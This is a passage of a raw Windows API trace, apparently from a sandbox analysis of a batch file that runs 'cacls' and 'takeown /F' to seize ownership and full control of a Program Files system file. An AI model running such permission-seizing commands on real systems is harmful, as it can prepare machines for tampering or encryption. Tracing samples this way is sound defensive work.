_wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0219.340] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0219.340] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0219.340] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0219.340] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0219.340] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0219.340] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0219.340] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0219.340] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0219.340] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0219.340] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0219.340] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0219.340] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0219.340] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0219.340] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0219.340] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0219.341] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0219.341] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0219.341] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0219.341] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0219.341] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0219.341] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0219.341] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0219.341] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0219.341] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0219.341] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0219.341] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0219.341] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0219.341] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0219.341] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0219.341] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0219.341] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0219.341] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0219.341] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0219.341] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0219.341] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0219.341] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0219.341] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0219.341] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0219.341] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0219.341] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0219.341] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0219.342] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0219.342] GetProcessHeap () returned 0x5f0000 [0219.342] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x418) returned 0x6061b8 [0219.342] SetErrorMode (uMode=0x0) returned 0x0 [0219.342] SetErrorMode (uMode=0x1) returned 0x0 [0219.342] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6061c0, lpFilePart=0x16ef00 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x16ef00*="Desktop") returned 0x25 [0219.342] SetErrorMode (uMode=0x0) returned 0x1 [0219.342] GetProcessHeap () returned 0x5f0000 [0219.342] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6061b8, Size=0x60) returned 0x6061b8 [0219.342] GetProcessHeap () returned 0x5f0000 [0219.342] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6061b8) returned 0x60 [0219.343] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0219.343] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0219.343] GetProcessHeap () returned 0x5f0000 [0219.343] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x120) returned 0x606220 [0219.343] GetProcessHeap () returned 0x5f0000 [0219.343] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x238) returned 0x606348 [0219.346] GetConsoleTitleW (in: lpConsoleTitle=0x16eccc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.803] GetConsoleTitleW (in: lpConsoleTitle=0x16ea60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.804] InitializeProcThreadAttributeList (in: lpAttributeList=0x16e8e8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16e9b0 | out: lpAttributeList=0x16e8e8, lpSize=0x16e9b0) returned 1 [0219.804] UpdateProcThreadAttribute (in: lpAttributeList=0x16e8e8, dwFlags=0x0, Attribute=0x60001, lpValue=0x16e9a8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16e8e8, lpPreviousValue=0x0) returned 1 [0219.804] GetStartupInfoW (in: lpStartupInfo=0x16e8a4 | out: lpStartupInfo=0x16e8a4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0219.821] CloseHandle (hObject=0x78) returned 1 [0219.821] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0219.821] GetProcessHeap () returned 0x5f0000 [0219.821] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x607f30 | out: hHeap=0x5f0000) returned 1 [0219.821] GetEnvironmentStringsW () returned 0x607f30* [0219.821] GetProcessHeap () returned 0x5f0000 [0219.821] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xb36) returned 0x608a70 [0219.822] FreeEnvironmentStringsW (penv=0x607f30) returned 1 [0219.822] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0229.825] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x16e884 | out: lpExitCode=0x16e884*=0x1f57) returned 1 [0229.826] CloseHandle (hObject=0x74) returned 1 [0229.826] _vsnwprintf (in: _Buffer=0x16e9cc, _BufferCount=0x13, _Format="%08X", _ArgList=0x16e890 | out: _Buffer="00001F57") returned 8 [0229.826] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00001F57") returned 1 [0229.826] GetProcessHeap () returned 0x5f0000 [0229.826] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x608a70 | out: hHeap=0x5f0000) returned 1 [0229.826] GetEnvironmentStringsW () returned 0x607f30* [0229.826] GetProcessHeap () returned 0x5f0000 [0229.826] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xb5c) returned 0x60a118 [0229.826] FreeEnvironmentStringsW (penv=0x607f30) returned 1 [0229.826] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0229.826] GetProcessHeap () returned 0x5f0000 [0229.826] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60a118 | out: hHeap=0x5f0000) returned 1 [0229.826] GetEnvironmentStringsW () returned 0x607f30* [0229.826] GetProcessHeap () returned 0x5f0000 [0229.827] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xb5c) returned 0x60a118 [0229.827] FreeEnvironmentStringsW (penv=0x607f30) returned 1 [0229.827] GetProcessHeap () returned 0x5f0000 [0229.827] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x5f0db8 | out: hHeap=0x5f0000) returned 1 [0229.827] DeleteProcThreadAttributeList (in: lpAttributeList=0x16e8e8 | out: lpAttributeList=0x16e8e8) [0229.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.827] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0229.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.827] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0229.828] _get_osfhandle (_FileHandle=0) returned 0x3 [0229.828] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0229.828] SetConsoleInputExeNameW () returned 0x1 [0229.828] GetConsoleOutputCP () returned 0x1b5 [0229.829] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0229.829] SetThreadUILanguage (LangId=0x0) returned 0x409 [0229.829] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16f104, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0229.830] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0229.830] _get_osfhandle (_FileHandle=3) returned 0x74 [0229.830] SetFilePointer (in: hFile=0x74, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0229.830] GetProcessHeap () returned 0x5f0000 [0229.830] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606aa0 | out: hHeap=0x5f0000) returned 1 [0229.830] GetProcessHeap () returned 0x5f0000 [0229.830] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606970 | out: hHeap=0x5f0000) returned 1 [0229.830] GetProcessHeap () returned 0x5f0000 [0229.830] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606848 | out: hHeap=0x5f0000) returned 1 [0229.830] GetProcessHeap () returned 0x5f0000 [0229.830] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6067e0 | out: hHeap=0x5f0000) returned 1 [0229.831] GetProcessHeap () returned 0x5f0000 [0229.831] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606710 | out: hHeap=0x5f0000) returned 1 [0229.831] GetProcessHeap () returned 0x5f0000 [0229.831] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6064f8 | out: hHeap=0x5f0000) returned 1 [0229.831] GetProcessHeap () returned 0x5f0000 [0229.831] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606478 | out: hHeap=0x5f0000) returned 1 [0229.831] GetProcessHeap () returned 0x5f0000 [0229.831] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606348 | out: hHeap=0x5f0000) returned 1 [0229.831] GetProcessHeap () returned 0x5f0000 [0229.831] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606220 | out: hHeap=0x5f0000) returned 1 [0229.831] GetProcessHeap () returned 0x5f0000 [0229.831] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6061b8 | out: hHeap=0x5f0000) returned 1 [0229.831] GetProcessHeap () returned 0x5f0000 [0229.831] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6060f0 | out: hHeap=0x5f0000) returned 1 [0229.831] GetProcessHeap () returned 0x5f0000 [0229.831] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x5f12a0 | out: hHeap=0x5f0000) returned 1 [0229.831] GetProcessHeap () returned 0x5f0000 [0229.831] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x5f1240 | out: hHeap=0x5f0000) returned 1 [0229.831] _get_osfhandle (_FileHandle=3) returned 0x74 [0229.832] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0229.832] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x16f0e8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x16f0e8*=0xc2, lpOverlapped=0x0) returned 1 [0229.832] SetFilePointer (in: hFile=0x74, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0229.832] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0229.833] _get_osfhandle (_FileHandle=3) returned 0x74 [0229.833] GetFileType (hFile=0x74) returned 0x1 [0229.833] _get_osfhandle (_FileHandle=3) returned 0x74 [0229.833] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0229.833] GetProcessHeap () returned 0x5f0000 [0229.833] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x400a) returned 0x614aa8 [0229.833] GetProcessHeap () returned 0x5f0000 [0229.833] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x614aa8 | out: hHeap=0x5f0000) returned 1 [0229.837] _tell (_FileHandle=3) returned 47 [0229.837] _close (_FileHandle=3) returned 0 [0229.837] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16eebc | out: _Buffer="\r\n") returned 2 [0229.837] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.837] GetFileType (hFile=0x7) returned 0x2 [0229.838] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.838] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16ee7c | out: lpMode=0x16ee7c) returned 1 [0229.838] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.838] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16eea8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16eea8*=0x2) returned 1 [0229.840] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0229.840] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0229.841] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x16eeb8 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0229.841] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x16eeb8 | out: _Buffer=">") returned 1 [0229.841] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.841] GetFileType (hFile=0x7) returned 0x2 [0229.841] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.841] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16ee80 | out: lpMode=0x16ee80) returned 1 [0229.842] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.842] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x16eeac, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x16eeac*=0x26) returned 1 [0229.842] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.842] GetFileType (hFile=0x7) returned 0x2 [0229.843] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.843] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f104 | out: lpMode=0x16f104) returned 1 [0229.843] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.843] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5f12a8*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x16f130, lpReserved=0x0 | out: lpBuffer=0x5f12a8*, lpNumberOfCharsWritten=0x16f130*=0x7) returned 1 [0229.844] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x16f13c | out: _Buffer=" /F \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\" ") returned 60 [0229.844] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.844] GetFileType (hFile=0x7) returned 0x2 [0229.844] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.844] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f0fc | out: lpMode=0x16f0fc) returned 1 [0229.844] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.844] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3c, lpNumberOfCharsWritten=0x16f128, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16f128*=0x3c) returned 1 [0229.846] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16f15c | out: _Buffer="\r\n") returned 2 [0229.846] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.846] GetFileType (hFile=0x7) returned 0x2 [0229.847] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.847] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f11c | out: lpMode=0x16f11c) returned 1 [0229.847] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.847] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f148, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16f148*=0x2) returned 1 [0229.849] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0229.849] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0229.849] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0229.850] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0229.850] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0229.850] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0229.850] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0229.850] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0229.850] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0229.850] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0229.850] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0229.850] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0229.850] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0229.850] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0229.850] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0229.850] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0229.850] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0229.850] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0229.850] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0229.850] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0229.850] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0229.850] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0229.850] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0229.850] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0229.850] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0229.850] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0229.850] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0229.851] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0229.851] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0229.851] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0229.851] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0229.851] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0229.851] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0229.851] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0229.851] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0229.851] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0229.851] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0229.851] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0229.851] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0229.851] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0229.851] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0229.851] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0229.852] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x606180, lpFilePart=0x16ef00 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x16ef00*="Desktop") returned 0x25 [0229.852] SetErrorMode (uMode=0x0) returned 0x1 [0229.852] GetProcessHeap () returned 0x5f0000 [0229.852] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x606178, Size=0x64) returned 0x606178 [0229.852] GetProcessHeap () returned 0x5f0000 [0229.852] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x606178) returned 0x64 [0229.853] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0229.853] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0229.853] GetProcessHeap () returned 0x5f0000 [0229.853] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x120) returned 0x6061e8 [0229.853] GetProcessHeap () returned 0x5f0000 [0229.853] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x238) returned 0x606310 [0229.853] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0229.853] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x16ec7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ec7c) returned 0xffffffff [0229.854] GetLastError () returned 0x2 [0229.854] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown", fInfoLevelId=0x1, lpFindFileData=0x16ec7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ec7c) returned 0xffffffff [0229.854] GetLastError () returned 0x2 [0229.854] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0229.855] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x16ec7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ec7c) returned 0x6064c0 [0229.855] FindClose (in: hFindFile=0x6064c0 | out: hFindFile=0x6064c0) returned 1 [0229.855] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x16ec7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ec7c) returned 0xffffffff [0229.855] GetLastError () returned 0x2 [0229.856] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x16ec7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ec7c) returned 0x6064c0 [0229.856] FindClose (in: hFindFile=0x6064c0 | out: hFindFile=0x6064c0) returned 1 [0229.856] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0229.856] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0229.856] GetConsoleTitleW (in: lpConsoleTitle=0x16eccc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0229.857] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x606c50, lpFilePart=0x16e7ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x16e7ec*="Desktop") returned 0x25 [0229.857] SetErrorMode (uMode=0x0) returned 0x1 [0229.857] GetProcessHeap () returned 0x5f0000 [0229.857] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x606c48, Size=0x64) returned 0x606c48 [0229.857] GetProcessHeap () returned 0x5f0000 [0229.857] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x606c48) returned 0x64 [0229.857] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0229.857] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0229.857] GetProcessHeap () returned 0x5f0000 [0229.857] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x120) returned 0x606770 [0229.857] GetProcessHeap () returned 0x5f0000 [0229.857] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x238) returned 0x606898 [0229.857] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0229.858] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x16e568, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e568) returned 0xffffffff [0229.858] GetLastError () returned 0x2 [0229.858] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown", fInfoLevelId=0x1, lpFindFileData=0x16e568, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e568) returned 0xffffffff [0229.858] GetLastError () returned 0x2 [0229.858] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0229.859] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x16e568, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e568) returned 0x606a48 [0229.859] FindClose (in: hFindFile=0x606a48 | out: hFindFile=0x606a48) returned 1 [0229.859] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x16e568, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e568) returned 0xffffffff [0229.859] GetLastError () returned 0x2 [0229.860] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x16e568, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e568) returned 0x606a48 [0229.860] FindClose (in: hFindFile=0x606a48 | out: hFindFile=0x606a48) returned 1 [0229.860] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0229.860] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0229.860] GetConsoleTitleW (in: lpConsoleTitle=0x16ea60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0229.860] InitializeProcThreadAttributeList (in: lpAttributeList=0x16e8e8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16e9b0 | out: lpAttributeList=0x16e8e8, lpSize=0x16e9b0) returned 1 [0229.860] UpdateProcThreadAttribute (in: lpAttributeList=0x16e8e8, dwFlags=0x0, Attribute=0x60001, lpValue=0x16e9a8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16e8e8, lpPreviousValue=0x0) returned 1 [0229.860] GetStartupInfoW (in: lpStartupInfo=0x16e8a4 | out: lpStartupInfo=0x16e8a4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, 